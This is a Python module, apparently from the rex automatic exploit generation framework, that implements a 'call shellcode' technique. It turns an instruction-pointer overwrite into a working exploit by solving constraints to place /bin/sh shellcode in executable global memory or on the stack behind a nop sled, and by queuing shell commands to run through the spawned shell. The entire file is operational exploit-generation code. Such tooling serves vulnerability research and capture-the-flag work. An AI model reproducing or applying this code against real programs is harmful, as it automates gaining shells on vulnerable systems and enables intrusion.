import logging

from ... import Vulnerability
from .. import Exploit, CannotExploit
from ..technique import Technique
from ..nopsleds import NopSleds
from ..actions import RexCommandAction

l = logging.getLogger("rex.exploit.techniques.call_shellcode")

class CallShellcode(Technique):

    name = "call_shellcode"
    applicable_to = ['unix']

    def check(self):
        # can only exploit ip overwrites
        if not self.crash.one_of([Vulnerability.IP_OVERWRITE, Vulnerability.PARTIAL_IP_OVERWRITE]):
            self.check_fail_reason("Cannot control IP.")
            return False

        if not self._is_stack_executable:
            self.check_fail_reason("Stack is not executable.")
            return False

        return True

    def align_down(self, addr, alignment=None):
        if alignment is None:
            alignment = self.crash.state.arch.instruction_alignment
        if addr % alignment == 0:
            return addr
        return addr - (addr % alignment)

    def align_up(self, addr, alignment=None):
        if alignment is None:
            alignment = self.crash.state.arch.instruction_alignment
        if addr % alignment == 0:
            return addr
        return addr + alignment - (addr % alignment)

    def apply(self, cmd=None, use_nopsled=True, **kwargs): #pylint:disable=arguments-differ

        # When ASLR is disabled, there might be a difference between the stack pointer we see in angr and the stack
        # pointer in the target process. Here we calculate the difference between our SP and the real one in coredump.
        sp_difference = 0
        if not self.crash.aslr and \
                not self.crash.state.regs.sp.symbolic and \
                self.crash.core_registers:
            # determine what the stack pointer register is called on this architecture
            sp_reg_name = self.crash.project.arch.get_register_by_name('sp').name
            if sp_reg_name in self.crash.core_registers:
                sp_difference = self.crash.core_registers[sp_reg_name] - \
                                self.crash.state.solver.eval(self.crash.state.regs.sp)
                l.debug("The difference between the stack pointer in the core dump and the stack pointer in angr's "
                        "final crashing state is %#x bytes.", sp_difference)

        # try to write shellcode into global memory
        shellcode = self.shellcode.get_default()

        # note that currently we only have /bin/sh shellcode, we need to add interaction with the shell
        # to execute arbitrary command
        if cmd:
            if not cmd.endswith(b"\n"):
                cmd += b"\n"
            channel_name = self.crash.input_type_to_channel(self.crash.input_type)
            act = RexCommandAction(cmd, channel_name=channel_name)
            self.crash.actions.append(act)
            act = RexCommandAction(b"exit\n", channel_name=channel_name)
            self.crash.actions.append(act)

        # try to write to some known memory address
        # 1) find a w+x region we can write to
        # 2) see if we can constrain its value to shellcode and the ip to that address
        # 3) done
        l.debug('try: shellcode in global data')
        for shc_addr, shc_constraint in self._write_executable_global_data(shellcode, alignment=self.crash.state.arch.instruction_alignment):
            l.debug("Attempting to place shellcode @ %s", hex(shc_addr))
            exp = self._attempt_jump([shc_constraint], shc_addr)
            if exp is not None:
                return exp

        # try to see if we can jump directly to the stack
        # 1) check that aslr is disabled
        # 2) find all the regions on the stack that are touched by stdin
        # 3) find the largest of those regions that are not concretely constrained
        # 4) check that we can jump to the middle of a nopsled in one of them
        # 5) done
        if not self.crash.aslr:
            l.debug('try: absolute address in stack')
            base_stack_addrs = self.crash.stack_control(below_sp=False)
            stack_addrs = {}
            for addr, size in base_stack_addrs.items():
                unconstrained_bufs = self._find_unconstrained_memory_buffers(addr, size)
                l.debug("Found %d buffer chunks inside %#x-%#x.", len(unconstrained_bufs), addr, addr+size)
                for addr2, size2 in unconstrained_bufs.items():
                    aligned_addr = self.align_up(addr2)
                    aligned_size = size2 - (aligned_addr - addr2)
                    if size2 >= len(shellcode):
                        stack_addrs[aligned_addr] = aligned_size

            word_size = self.crash.state.arch.bits // self.crash.state.arch.byte_width
            for root in sorted(stack_addrs, key=lambda a: -stack_addrs[a]):
                if stack_addrs[root] < len(shellcode):
                    continue

                # Where do we want to write the shellcode to? Note that we are not always able to write the shellcode
                # from the very beginning of root. Some smart probing is necessary.
                # FIXME: I'm not smart enough to do a smart probing.
                for offset in range(0, stack_addrs[root] - len(shellcode), word_size):
                    sc_data = self.crash.state.memory.load(root + offset, len(shellcode))
                    sc_constraint = sc_data == shellcode
                    if self.crash.state.solver.satisfiable(extra_constraints=(sc_constraint,)):
                        break
                else:
                    l.debug("Cannot write shellcode in region %#x(%#x bytes). Probe the next region.",
                            root, stack_addrs[root]
                            )
                    continue
                l.debug("We may write shellcode on the stack at root={:x} offset={:x} loc={:x}".format(root, offset, root + offset))

                if use_nopsled:
                    nopsled_size, nopsled_chunk = self._determine_nopsled_length(stack_addrs, root, offset, shellcode)
                else:
                    nopsled_size = 0
                    nopsled_chunk = None

                # try the addresses in a spiral pattern
                addrs = list(range(0, nopsled_size + 1, len(nopsled_chunk)))
                cur = len(addrs) // 2
                for i in range(len(addrs)):
                    if i % 2 == 0:
                        cur += i
                    else:
                        cur -= i
                    addr = root + offset + addrs[cur]
                    if addr % self.crash.state.arch.instruction_alignment != 0:
                        continue

                    if nopsled_size > 0:
                        # update sc_constraint
                        # nopsled_size = root + stack_addrs[root] - len(shellcode) - addr
                        works, sc_constraint = self._attempt_write_nopsled(self.crash.state, shellcode, root + offset,
                                                                           nopsled_size, nopsled_chunk)
                        if not works:
                            continue

                    adjusted_addr = addr + sp_difference
                    exp = self._attempt_jump([sc_constraint], adjusted_addr, bypasses_aslr=False)
                    if exp is not None:
                        l.info("Got Exploit!")
                        return exp

        # try to read shellcode into memory into one of the aforementioned addresses
        l.debug("try: read shellcode into global data")
        try:
            shc_addr, shc_constraint = self._read_in_global_data(shellcode)
        except CannotExploit as e:
            raise CannotExploit("[%s] cannot call read (all other call-shellcodes failed)" % self.name) from e

        exp = self._attempt_jump([shc_constraint], shc_addr)
        if exp is not None:
            return exp

        raise CannotExploit("[%s] EVERYTHING FAILED" % self.name)

    def _find_unconstrained_memory_buffers(self, addr, size):
        """
        Determine if the memory buffer has enough freedom, i.e., is "unconstrained enough", to store shellcode in the
        future.

        :param int addr:    The beginning address of the buffer.
        :param int size:    Maximum size of the buffer.
        :return:            A dict with (root, length) as k-v pairs where each element represents a buffer if we
                            believe the buffer starting from `root` with `length` bytes is "unconstrained enough". If no
                            such buffer can be found, an empty list is returned.
        :rtype:             list[tuple]
        """

        buffer_chunks = { }

        def _record_buffer(root, new_addr):
            if root is None:
                root = new_addr
                buffer_chunks[root] = 1
            else:
                buffer_chunks[root] += 1
            return root

        root = None
        for subaddr in range(addr, addr + size):
            val = self.crash.state.memory.load(subaddr, 1)
            # TODO: This sucks. do a real approximation with something like DVSA.
            if any('aeg_input' in name for name in val.variables):
                if not any(c.op == '__eq__' for c in self.crash.state.solver.constraints if not
                        c.variables - val.variables):
                    # this is the best case: this byte seems entirely unconstrained
                    root = _record_buffer(root, subaddr)
                    continue

                if not any(c.args[0] is val for c in self.crash.state.solver.constraints if c.op == '__eq__'):
                    # this is a looser constraint: there does not exist any constraint that's like the following:
                    #     val == N
                    root = _record_buffer(root, subaddr)
                    continue

            # it is unlikely that the current byte can be part of the shellcode. reset root
            root = None

        return buffer_chunks

    def _determine_nopsled_length(self, stack_addrs, root, offset, shellcode):

        min_nopsled_size = 0
        max_nopsled_size = stack_addrs[root] - offset - len(shellcode)
        nopsled_chunks = NopSleds.get_nopsleds(self.crash.state.arch)
        assert nopsled_chunks
        nopsled_chunk = nopsled_chunks[0]  # TODO: use more than one nopsleds
        while min_nopsled_size < max_nopsled_size:
            attempt = (min_nopsled_size + max_nopsled_size + 1) // 2
            works, _ = self._attempt_write_nopsled(self.crash.state, shellcode, root + offset, attempt,
                                                               nopsled_chunk)
            if not works:
                # we are trying to write too many. Write less!
                max_nopsled_size = attempt - self.crash.state.arch.instruction_alignment
            else:
                # try to write more?
                min_nopsled_size = attempt

        return min_nopsled_size, nopsled_chunk

    def _attempt_jump(self, constraints, addr, bypasses_nx=False, bypasses_aslr=True):
        all_constraints = list(constraints) + [self.crash.state.regs.ip == addr]

        if self.crash.state.solver.satisfiable(extra_constraints=all_constraints):
            self.crash.state.solver.add(*all_constraints)
            return Exploit(self.crash, bypasses_aslr=bypasses_aslr, bypasses_nx=bypasses_nx, target_ip=addr)

        return None

    @staticmethod
    def _attempt_write_nopsled(state, shellcode, start, nopsled_size, nopsled_chunk):
        nopsled_count = nopsled_size // len(nopsled_chunk)
        rounded_size = nopsled_count * len(nopsled_chunk)
        sc_data = state.memory.load(start, len(shellcode) + rounded_size)
        sc_constraint = sc_data == nopsled_chunk * nopsled_count + shellcode
        return state.solver.satisfiable(extra_constraints=(sc_constraint,)), sc_constraint
